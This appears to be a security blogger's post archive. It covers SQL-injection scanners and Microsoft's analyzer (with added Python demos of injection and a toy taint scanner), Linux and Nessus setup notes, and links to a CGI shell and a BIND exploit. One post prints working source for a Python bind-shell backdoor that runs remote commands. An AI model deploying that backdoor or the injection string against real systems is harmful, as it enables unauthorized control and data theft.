 
HTTP FUZZER?  

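Need a fuzzer for work? Out of boredom I wrote a neither-fish-nor-fowl Perl script and called it TestFuzzer version 1.0 (to be upgraded later). At first I tested it in a VM and everything worked; once I moved it to my own machine I ran into problems. After a long search I finally found that ESET NOD32 was the cause (磁力 had mentioned this to me long ago, but I did not believe it was that much of a rogue; disabling real-time protection did not help either): it redirects all of our normal sockets into its own process (ekrn.exe) for filtering. Sigh... The final conclusion: NOD keeps other people out, and at the same time I cannot get out either...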

 

TestFuzzer v1.0?!:)

Tags: Security Technology | Views (7) | Comments (0) | 11-21 08:55
Something left over from learning CGI

PERL CGI SHELL

http://www.i170.com/Attach/70C0D4DC-1007-4270-92C9-C47F35D705D5

Tags: Security Technology | Views (131) | Comments (0) | 10-04 17:32
Finding SQL Injection with Scrawlr  

The HP Security Laboratory

Finding SQL Injection with Scrawlr

 

Yes, we know that other blogs on this issue have included this comic, but it's just too perfect to not reference it

You have likely been tracking the mass SQL Injections that are currently sweeping through the net. Just last night I was shopping on www.ihomeaudio.com when I noticed they had been injected (they have since fixed their site). HP started to observe these attacks in January. They spread to over 500,000 sites by April before calming down and then picking up again in May. Most of the sites hit were initially Microsoft IIS ASP applications, causing many security companies to mistake this for some sort of new vulnerability in IIS and leading Microsoft to research the possibility, but alas, it's just our old friend, SQL Injection. Indeed we now see this attack hitting ASP and PHP sites and thanks to Google, it's easy to see just which sites out there have been hit.

While we were closely following the situation, the nice folks at Microsoft contacted us to see if we could work together to help people identify and cope with this issue. Together we quickly developed an action plan. The Microsoft Security Response Center (MSRC) was in a tough spot: hundreds of thousands of ASP sites were getting hacked, yet the vulnerability wasn't something Microsoft could release a patch for. SQL Injection is an issue that occurs because of poorly written web code interfacing with the web site's backend database and the solution was much more complicated than a simple patch. Developers were going to have to learn about security and were going to have to patch their code if they were going to solve this. Microsoft's Security Vulnerability Research & Defense has a blog about this problem as well where they share Microsoft's recommendations for this problem.

Now if you are no stranger to web security, you might be saying "well duh" right about now. Unfortunately to at least 500,000 sites on the Internet this concept is still pretty new and if you are one of the folks who are just now learning what SQL Injection is, I highly recommend you read HP's Web Security Research Group white papers on verbose and blind SQL injection located in our HP application security resource library.

 

Introducing HP Scrawlr 

When Microsoft contacted us, they asked us to equip their customers with the tools necessary to quickly find SQL Injection vulnerabilities in their sites. HP's application security software, DevInspect, QAInspect and WebInspect all find SQL Injection and countless other security vulnerabilities. DevInspect can even inspect your source code for SQL Injection as well and guide developers through the process of fixing their code. But what if you need to just quickly look for SQL Injection before you decide how you are going to handle the issue? We needed something quick, highly accurate and easy to download and install.

Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names!

Technical details for Scrawlr

  • Identify Verbose SQL Injection vulnerabilities in URL parameters
  • Can be configured to use a Proxy to access the web site
  • Will identify the type of SQL server in use
  • Will extract table names (verbose only) to guarantee no false positives

Scrawlr does have some limitations versus our professional solutions and our fully functional SQL Injector tool

  • Will only crawl up to 1500 pages
  • Does not support sites requiring authentication
  • Does not perform Blind SQL injection
  • Cannot retrieve database contents
  • Does not support JavaScript or flash parsing
  • Will not test forms for SQL Injection (POST Parameters)

Download Scrawlr

You can download Scrawlr by visiting the following link: https://download.spidynamics.com/products/scrawlr/

Scrawlr is offered as-is and is not a supported product. Assistance may be available from other Scrawlr users in our online Scrawlr forum located at http://www.communities.hp.com/securitysoftware/forums/198.aspx

You can learn more about the HP Web Application Security Group and the HP Application Security Center by visiting our Security Community site at www.communities.hp.com/securitysoftware/ or by visiting our product information page at www.hp.com/go/securitysoftware/

 

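Tags: Security Technology | Views (143) | Comments (0) | 09-13 13:04
[Repost] The Microsoft Source Code Analyzer for SQL Injection tool is now available to find SQL injection vulnerabilities in ASP code

The Microsoft Source Code Analyzer for SQL Injection tool is now available to find SQL injection vulnerabilities in ASP code

Article ID: 954476
Last modified: June 27, 2008
Revision: 1.1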

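Introduction

This article describes the Microsoft Source Code Analyzer for SQL Injection tool. You can use this static code analysis tool to find SQL injection vulnerabilities in ASP code.

More information

The Microsoft Source Code Analyzer for SQL Injection tool is a static code analysis tool that helps find SQL injection vulnerabilities in Active Server Pages (ASP) code. This article describes how to use the tool, the warnings that it generates, and its limitations. For more information, see the tool's Readme document.

Prerequisites

This command-line tool requires the following software:
.NET Framework 3.0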

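SQL injection issues in ASP code

If user-supplied data from the "Request.Form" or "Request.Querystring" collections in ASP code is used to construct dynamic SQL statements without any data validation, an attacker can inject SQL commands into the SQL statement and then misuse it. This issue is generally known as a first-order SQL injection vulnerability.

If user input is stored in a database by one ASP page, and that input is then retrieved from the database and used to construct dynamic SQL statements in a different ASP page, an attacker can inject SQL commands into the SQL statement and then misuse it. This issue is generally known as a second-order SQL injection vulnerability.

To mitigate these vulnerabilities, it is best to use parameterized SQL queries. For more information about SQL injection vulnerabilities in ASP and about methods to mitigate them, visit the following Microsoft Web site:
http://msdn.microsoft.com/zh-cn/library/cc676512(en-us).aspx
The Microsoft Source Code Analyzer for SQL Injection tool helps you find some of these issues automatically.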
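
The first-order and second-order cases described above, side by side with the parameterized fix, as an added example that is not part of the KB article. Python's sqlite3 module stands in for ASP and ADO here; the table names, rows and the crafted input are constructed for the illustration.

```python
import sqlite3

# Constructed input: a value that closes the quoted literal and adds a tautology.
CRAFTED = "x' OR '1'='1"


def make_db():
    """In-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (name TEXT, secret TEXT);
        CREATE TABLE profiles (owner TEXT, nickname TEXT);
        INSERT INTO users VALUES ('alice', 'alice-secret');
        INSERT INTO users VALUES ('bob', 'bob-secret');
    """)
    return db


# First-order: request data goes straight into the statement text.
def lookup_concat(db, name):
    sql = "SELECT secret FROM users WHERE name = '" + name + "'"
    return sorted(row[0] for row in db.execute(sql))


# Same query with a bound parameter: the value can never change the statement.
def lookup_param(db, name):
    rows = db.execute("SELECT secret FROM users WHERE name = ?", (name,))
    return sorted(row[0] for row in rows)


# Second-order: one page stores the value (safely), another page reads it back
# from the database and trusts it when building a new statement.
def save_nickname(db, owner, nickname):
    db.execute("INSERT INTO profiles VALUES (?, ?)", (owner, nickname))


def stored_nickname(db, owner):
    row = db.execute(
        "SELECT nickname FROM profiles WHERE owner = ?", (owner,)
    ).fetchone()
    return row[0]


def secrets_by_nickname_concat(db, owner):
    return lookup_concat(db, stored_nickname(db, owner))


def secrets_by_nickname_param(db, owner):
    return lookup_param(db, stored_nickname(db, owner))


if __name__ == "__main__":
    db = make_db()
    print(lookup_concat(db, "alice"))      # normal input: one row
    print(lookup_concat(db, CRAFTED))      # WHERE clause rewritten: every row
    print(lookup_param(db, CRAFTED))       # treated as a plain string: no rows
    save_nickname(db, "mallory", CRAFTED)  # stored with a parameter, still dangerous later
    print(secrets_by_nickname_concat(db, "mallory"))
    print(secrets_by_nickname_param(db, "mallory"))
```

The second-order case shows why storing input safely is not enough: the value has to be bound as a parameter every time it is used in a statement, including when it comes back from the database.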


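Usage

This section describes how to use the tool.

Syntax

The tool uses the following syntax:
msscasi_asp.exe [/nologo] [/quiet] [/suppress=num;..;num] [/GlobalAsaPath=path] [/IncludePaths=path;..;path] /Input=file.asp

Description

The tool analyzes ASP code for SQL injection vulnerabilities.

Parameter list

| Parameter | Option | Description |
|---|---|---|
| /GlobalAsaPath | path | Displays the path of the Global.asa file. |
| /IncludePaths | paths | Displays the semicolon-separated paths used to resolve files that are included by using virtual paths. |
| /input | asp file | Displays the absolute path of the ASP file that must be analyzed. |
| /suppress warnings | | Warnings are not reported. |
| /nologo | | The tool logo is not displayed. |
| /quiet | | Parsing errors are not displayed. If you use the "/nologo" and "/quiet" switches, only warning messages are displayed. |

Examples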

MSSCASI_ASP /input="c:\source\logon.asp"

MSSCASI_ASP /GlobalAsaPath="C:\source" /input="c:\source\webitems\display.asp"

MSSCASI_ASP /GlobalAsaPath="C:\source" /input="c:\source\webitems\display.asp" /IncludePaths="C:\virtualdirectory1;C:\virtualdirectory2"

MSSCASI_ASP /input="c:\source\webitems\display.asp" /suppress="80406;80407"

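Reviewing the output

The tool generates the following warnings:

| Warning | Description |
|---|---|
| 80400 | Possible SQL injection vulnerability through data that is read from the Request object without any input validation. These warnings are very likely bugs that must be fixed. |
| 80406 | Possible SQL injection vulnerability through data that is read from the Request object where the input is passed through some unknown function calls that might perform data validation. If no data validation is done inside the function call, these warnings are very likely bugs. Otherwise, they are false positives. |
| 80403 | Possible SQL injection vulnerability through data that comes from a back-end server. If the data is controlled by an end user through some other Web site, these warnings are very likely bugs. However, if the data is highly trusted, these warnings may not be bugs. Parameterizing the queries is still good practice as part of a defense-in-depth strategy. |
| 80407 | Possible SQL injection vulnerability through data that comes from a back-end server and is passed through some unknown function calls. If the data is controlled by an end user through other Web sites, and no data validation is performed on it, these warnings are very likely bugs. |
| 80420 | Possible SQL injection vulnerability through function parameters. These warnings are generated at function scope. Therefore, if the function parameter values come from trusted sources, these warnings are false positives. If the parameter values are controlled by end users, these warnings are very likely bugs. You can use the __sql_pre_validated annotation on the function parameters to detect whether end users can reach this code. |
| 80421 | Possible SQL injection vulnerability through function parameters that are passed through some unknown function calls that might perform data validation. You can use the __sql_pre_validated annotation on the function parameters and __sql_validate on the validation function to detect whether end users can reach this code. |

Of all the warnings that the tool generates, warning 80400 is the most likely to indicate actual bugs. ASP Web developers must fix these bugs by using parameterized queries. For more information about how to use parameterized SQL queries in ASP code, visit the following Microsoft Web site:
http://msdn.microsoft.com/zh-cn/library/cc676512(en-us).aspx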
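
To make the difference between warnings 80400 and 80406 concrete, here is a simplified line-based taint sketch, added as an example; it is not the Microsoft tool's algorithm or code and covers only those two warnings. The sample ASP lines are constructed, `CleanInput` is a hypothetical helper, and the `suppress` argument only mimics the effect of the `/suppress` switch.

```python
import re

STRING = re.compile(r'"(?:[^"]|"")*"')                    # VBScript string literal
SOURCE = re.compile(r'\bRequest\.(?:Form|QueryString)\b', re.I)
ASSIGN = re.compile(r'^\s*(?:Set\s+)?(\w+)\s*=\s*(.+)$', re.I)
SINK = re.compile(r'\.(?:Execute|Open)\b(.*)$', re.I)     # ADO calls that run SQL
CALL = re.compile(r'^\w+\s*\(')

RAW, VIA_CALL = 2, 1                                      # taint levels
WARNING = {RAW: 80400, VIA_CALL: 80406}                   # ids from the table above


def wrapped_in_one_call(expr):
    """True when expr is a single call f(...) whose '(' closes at the very end."""
    match = CALL.match(expr)
    if not match:
        return False
    depth = 0
    for index in range(match.end() - 1, len(expr)):
        depth += {'(': 1, ')': -1}.get(expr[index], 0)
        if depth == 0:
            return index == len(expr) - 1
    return False


def expr_level(expr, taint):
    """Taint level of an expression whose string literals were already blanked."""
    expr = expr.strip()
    level = RAW if SOURCE.search(expr) else 0
    for name in re.findall(r'[A-Za-z_]\w*', expr):
        level = max(level, taint.get(name.lower(), 0))
    # Data that went through a function this sketch cannot see into may or
    # may not have been validated, so it is downgraded rather than cleared.
    return VIA_CALL if level and wrapped_in_one_call(expr) else level


def scan(lines, suppress=()):
    """Return [(line_number, warning_id)] for request data reaching Execute/Open."""
    taint, findings = {}, []
    for number, line in enumerate(lines, 1):
        code = STRING.sub('""', line).split("'")[0]       # blank literals, drop comments
        sink = SINK.search(code)
        if sink:
            level = expr_level(sink.group(1), taint)
            if level and WARNING[level] not in suppress:
                findings.append((number, WARNING[level]))
        assign = ASSIGN.match(code)
        if assign:
            taint[assign.group(1).lower()] = expr_level(assign.group(2), taint)
    return findings


# Constructed sample page; CleanInput is a hypothetical helper defined elsewhere.
SAMPLE_ASP = '''\
name = Request.Form("name")
sql1 = "SELECT * FROM users WHERE name='" & name & "'"
Set rs1 = conn.Execute(sql1)
id = CleanInput(Request.QueryString("id"))   ' unknown function, may validate
sql2 = "SELECT * FROM items WHERE id=" & id
rs2.Open sql2, conn
sql3 = "SELECT * FROM items WHERE visible=1"
Set rs3 = conn.Execute(sql3)
'''.splitlines()

if __name__ == "__main__":
    print(scan(SAMPLE_ASP))                    # all findings
    print(scan(SAMPLE_ASP, suppress={80406}))  # like /suppress="80406"
```

Line 3 of the sample is the 80400 case (request data concatenated with no validation at all) and line 6 is the 80406 case, which needs a human to read `CleanInput` before it can be dismissed as a false positive.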

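Limitations

The tool has the following known limitations:
The tool can only parse ASP code that is written in VBScript. It currently cannot parse server-side code that is written in any other language, such as JScript.
As part of the development of this tool, we developed a new ASP parser. However, this parser cannot cover all ASP constructs. Therefore, you may see some parsing errors.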

References

To download the Microsoft Source Code Analyzer for SQL Injection tool, visit the following Microsoft Web site:
http://www.microsoft.com/downloads/details.aspx?FamilyId=58A7C46E-A599-4FCB-9AB4-A4334146B6BA
For more information about various best-practice documents, visit the following Microsoft Web site:
http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx
For more information about preventing SQL injection in ASP, visit the following Microsoft Web site:
http://msdn.microsoft.com/zh-cn/library/cc676512(en-us).aspx
For more information about SQL injection attacks, visit the following Microsoft Web site:
http://blogs.msdn.com/sdl/archive/2008/05/15/giving-sql-injection-the-respect-it-deserves.aspx
For more information about this tool, visit the following Microsoft Web site:
http://blogs.msdn.com/sqlsecurity
To discuss this tool in the MSDN SQL Security forum, visit the following Microsoft Web site:
http://forums.microsoft.com/msdn/ShowForum.aspx?ForumID=92&SiteID=1

The information in this article applies to:
Microsoft ASP.NET 2.0

Keywords:
atdownload kbexpertiseadvanced kbcode kbexpertiseinter kbinfo kbsecadvisory kbsecurity kbsecvulnerability KB954476


Tags: Security Technology | Views (134) | Comments (0) | 09-13 12:11
[Repost] Microsoft identifies tools to address SQL injection attacks

By Robert Westervelt, News Editor
24 Jun 2008 | SearchSecurity.com

 

Microsoft is alerting customers to several tools that could bolster Web application development in the wake of a rising number of SQL injection attacks targeting faulty code in websites.

The software giant recommended customers use the tools in a security advisory Tuesday. It warned customers that it was tracking a rising number of attacks on websites that use Microsoft ASP and ASP.NET technologies. The problem lies with tiny software coding flaws that are difficult to detect.

"These SQL injection attacks do not exploit a specific software vulnerability, but instead, target websites that do not follow secure coding practices for accessing and manipulating data stored in a relational database," said Bill Sisk, Microsoft's security response communications (MSRC) manager.

Researchers had been tracking the mass SQL injection on thousands of websites over the last several months. The attacks are automated, using a number of hacker toolkits that can be purchased on the black market. Ultimately, the attack triggers an error on the server hosting the Web application, allowing the attacker to insert his own code and gain access to the system. It's unclear how many sites have been compromised.

In its advisory to customers, Microsoft identified Scrawlr, a vulnerability scanner co-developed by Hewlett Packard and researchers at the MSRC, which identifies whether a website is susceptible to SQL injection. In a blog entry, HP's Erik Peterson, senior director of products for the application security center, said the tool is not as robust as the vendor's fully supported products, but it is a free and fast way to analyze a website for potential problems. The tool can't identify the line of code responsible and will only crawl up to 1,500 pages. It doesn't support sites requiring authentication and won't test forms for SQL injection, among other limitations, he said.

UrlScan version 3.0 Beta is a tool developed by Microsoft that blocks HTTP requests. Microsoft said the tool will stop harmful requests from reaching the Web application on the server. The tool is designed to read the configuration from the urlscan.ini file. Multiple instances of the tool can be installed to serve as URL filters. It can be tweaked by an administrator to restrict the types of requests processed by the Internet Information Services (IIS).

Microsoft Source Code Analyzer for SQL Injection is also available to detect ASP code susceptible to SQL injection attacks. It generates a report that displays the coding issue. Microsoft admits that the tool also has some limitations -- it only addresses ASP code written in VBScript, and its use could result in some parsing errors.

Putting the tools in the hands of Web developers and IT administrators could help accelerate security awareness in the same way poor product quality did in the mid-90s, said Amrit Williams, a former Gartner analyst, now chief technology officer at BigFix. Williams cautioned that the tools are not a substitute for more advanced technologies or experienced and thorough human analysis.

"Unfortunately it always takes a significant incident to drive folks towards doing the right thing," Williams said in an email exchange. "This is especially true of security as part of the software development life cycle and even more so for Web development, which tends to be rapid, ad-hoc and less structured than traditional software development."

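Tags: Security Technology | Views (144) | Comments (0) | 09-13 12:07
[Dummies' guide] Cookie-based SQL injection

A foolproof experiment I did recently. The reason for the experiment was, once again, a question I was discussing with a customer. Customers are getting stronger and stronger these days; I am starting to feel that I cannot keep up with them, and if we do not work harder we will all be out of a job soon :P

The document and materials are here.

Tags: Security Technology | Views (179) | Comments (0) | 09-11 03:11
My sources.list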

#deb cdrom:[Ubuntu 8.04 _Hardy Heron_ - Release i386 (20080423)]/ hardy main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.

deb http://cn.archive.ubuntu.com/ubuntu/ hardy main restricted
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy main restricted

## Major bug fix updates produced after the final release of the
## distribution.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates main restricted
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates main restricted

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## universe WILL NOT receive any review or updates from the Ubuntu security
## team.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy universe
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy universe
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates universe
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates universe

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## multiverse WILL NOT receive any review or updates from the Ubuntu
## security team.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy multiverse
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy multiverse
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates multiverse
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates multiverse

## Uncomment the following two lines to add software from the 'backports'
## repository.
## N.B. software from this repository may not have been tested as
## extensively as that contained in the main release, although it includes
## newer versions of some applications which may provide useful features.
## Also, please note that software in backports WILL NOT receive any review
## or updates from the Ubuntu security team.
# deb http://cn.archive.ubuntu.com/ubuntu/ hardy-backports main restricted universe multiverse
# deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-backports main restricted universe multiverse

## Uncomment the following two lines to add software from Canonical's
## 'partner' repository. This software is not part of Ubuntu, but is
## offered by Canonical and the respective vendors as a service to Ubuntu
## users.
# deb http://archive.canonical.com/ubuntu hardy partner
# deb-src http://archive.canonical.com/ubuntu hardy partner

# Line commented out by installer because it failed to verify:
#deb http://security.ubuntu.com/ubuntu hardy-security main restricted
# Line commented out by installer because it failed to verify:
#deb-src http://security.ubuntu.com/ubuntu hardy-security main restricted
# Line commented out by installer because it failed to verify:
#deb http://security.ubuntu.com/ubuntu hardy-security universe
# Line commented out by installer because it failed to verify:
#deb-src http://security.ubuntu.com/ubuntu hardy-security universe
# Line commented out by installer because it failed to verify:
#deb http://security.ubuntu.com/ubuntu hardy-security multiverse
# Line commented out by installer because it failed to verify:
#deb-src http://security.ubuntu.com/ubuntu hardy-security multiverse

deb http://ubuntu.cn99.com/ubuntu/ gutsy main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-security main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-updates main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-proposed main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-backports main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-security main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-updates main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-proposed main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-backports main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu-cn/ gutsy main restricted universe multiverse

deb http://www.debian-multimedia.org etch main
deb http://www.debian-multimedia.org testing main

Tags: Security Technology, Ramblings | Views (179) | Comments (0) | 09-02 23:27
Replacing the Linux kernel

Recently, for various reasons, I needed to replace the Linux kernel. I wrote down the procedure; criticism is welcome:

Original system: Fedora Core 9
Linux localhost.localdomain 2.6.25-14.fc9.i686 #1 SMP Thu May 1 06:28:41 EDT 2008 i686 i686 i386 GNU/Linux
Needs to be downgraded to:
linux-2.6.24.6
Procedure:
[root@localhost ~]# cd /usr/local/sbin
[root@localhost sbin]# wget http://www.de.kernel.org/pub/linux/kernel/v2.6/linux-2.6.24.6.tar.gz
[root@localhost sbin]# tar -zxvf linux-2.6.24.6.tar.gz
[root@localhost sbin]# mv linux-2.6.24.6 linux
[root@localhost sbin]# ln -s /usr/local/sbin/linux /usr/src/linux
[root@localhost sbin]# cd /usr/src/linux
[root@localhost linux]# make mrproper                <-- removes old .o files; on a first run this step can actually be skipped
[root@localhost linux]# make menuconfig
[root@localhost linux]# make dep                     <-- builds dependencies; on a first run this step can actually be skipped
*** Warning: make dep is unnecessary now.
[root@localhost linux]# make clean                   <-- removes unneeded files
[root@localhost linux]# make bzImage                 <-- compiles the kernel
[root@localhost linux]# make modules                 <-- compiles the modules
[root@localhost linux]# make modules_install         <-- installs the modules
[root@localhost linux]# make install                 <-- this step builds the initrd (the program used to load LKMs)
[root@localhost linux]# new-kernel-pkg --install --mkinitrd --depmod 2.6.24.6  <-- writes to grub.conf
[root@localhost linux]# shutdown -r now
The upgrade result after rebooting:
Linux localhost.localdomain 2.6.24.6 #1 SMP Tue Aug 26 23:15:14 CST 2008 i686 i686 i386 GNU/Linux

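Tags: Security Technology | Views (176) | Comments (0) | 09-01 03:33
[ScreenOS] Using destination-address-based NAT instead of MIP

Thanks to my colleague Xiao Zhong for the guidance; it is here

Tags: Security Technology | Views (170) | Comments (0) | 08-28 23:22
Bug fix for the search engine detection script.

Search engine detection script:

Thanks to Jetty for the reminder; I also fixed some bugs. It is here:

www.i170.com/Attach/89547786-C0CE-4AFC-99BF-71F6093574EB

Tags: Security Technology | Views (182) | Comments (0) | 08-23 19:30
A small Python backdoor; thanks to my colleagues Brother Zhou and Brother Peng for their guidance :)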

#!/usr/bin/python
#code by demonalex@163.com
import socket;
import os;

address=raw_input("Server Address:");
print "Repeat: Server Address:",address,"!";
port=raw_input("Port:");
print "Repeat: Port:",port,"!";

HOST=address;
PORT=int(port);

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,6);
s.bind((HOST,PORT));
s.listen(1);
conn, addr = s.accept();
#print "Connect by ",addr,"!";
while(1):
    conn.send("(");
    conn.send(os.getcwd());
    conn.send(")command:");
    data=conn.recv(1024);
    if not data: break;
    #print data,":",len(data);
    if (data[0:3]=='cd '):
        curr_dir=data[3:].strip();
        os.chdir(curr_dir);
        continue;
    if ((data[1]==':')and(len(data)==3)):
        curr_dir=data.strip();
        os.chdir(curr_dir);
        continue;
    if (data=="exit\n"):
        conn.send("bye!\n");
        break;
    result=os.popen(data).read();
    conn.send(result);
conn.close;
s.close;

Tags: Security Technology, Ramblings | Views (245) | Comments (1) | 08-20 03:09
Installing Nessus on Ubuntu

Installing Nessus on Ubuntu
writer: demonalex[at]dark2s[dot]org


{Environment}
Operating system: Ubuntu 8.04 desktop edition (2.6.24-16-generic #1 SMP)
nessus: version 2.2.9

{Installation}
root@demonalex-laptop:~# apt-get update
root@demonalex-laptop:~# apt-get -y install nessus nessusd nessus-plugins

{Configuration}
After installation, add a user with nessus-adduser:
root@demonalex-laptop:~# nessus-adduser
Using /var/tmp as a temporary file holder

Add a new nessusd user
----------------------


Login : admin                              <-- enter the new user name
Authentication (pass/cert) [pass] :        <-- just press Enter (password authentication)
Login password :                           <-- enter the password
Login password (again) :                   <-- enter the password again

User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that admin has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser(8) man page for the rules syntax

Enter the rules for this user, and hit ctrl-D once you are done :
(the user can have an empty rules set)           <-- press Ctrl+D to continue


Login             : admin
Password          : ***********
DN                :
Rules             :


Is that ok ? (y/n) [y]                           <-- just press Enter (confirms the new user)
user added.
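root@demonalex-laptop:/usr/bin# nessus-fetch --register <your serial number>

{Update}
root@demonalex-laptop:~# nessus-update-plugins

{Running}
First start the server:
root@demonalex-laptop:~# nessusd -D
Then go to the desktop and choose "Application->Internet->Nessus" on the panel. In the "Nessusd Host" tab of the Nessus GUI client that pops up, enter the account and password and click the "Log in" button. After a successful login the client switches automatically to the "Plugins" tab; select the plugins to scan with, then go manually to the "Target" tab, enter the IP address of the scan target, and finally click the "Start the scan" button. When the scan finishes, the report window is displayed.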

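Tags: Security Technology | Views (245) | Comments (0) | 08-14 13:38
A detection script for search-type SQL injection that I wrote recently; still the foolproof kind...

Run result:

In addition, a log file named uselog.txt is generated in the same directory. It carries on from my earlier get-series programs, but this time it is "open source", haha :D. Because it is still pretty rough, I hope you experts will help improve it :P. The code and test materials can be downloaded here: www.i170.com/Attach/39450C6D-8D05-4493-91B0-E2FC48458768

If you do not want to download it, you can read the code directly below:

Read more...
Tags: Security Technology | Views (294) | Comments (1) | 08-12 06:19
[Repost] BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)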

#BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
#http://www.milw0rm.com/exploits/6123

 

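Read more...
Tags: Security Technology | Views (208) | Comments (0) | 08-01 16:12
[Repost] Urgent upgrade! Hackers use DNS vulnerability to control the network

http://security.ctocio.com.cn/securitycomment/122/8210122.shtml

Tags: Security Technology | Views (359) | Comments (2) | 07-17 23:49
[Repost] [Ubuntu reference] Apt-get usage guide

[Ubuntu reference] Apt-get usage guide
April 18, 2008 10:30
Apt-get usage guide - Ubuntu Chinese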

wiki.ubuntu.org.cn/Apt-get%E4%BD%BF%E7%94%A8%E6...

Ubuntu Chinese Forum :: View topic - [Original] Introduction to apt-get and other command-line tools

forum.ubuntu.com.cn/viewtopic.php?t=65707&highl...

 

Read more...
Tags: Security Technology, Ramblings | Views (327) | Comments (1) | 06-26 15:58
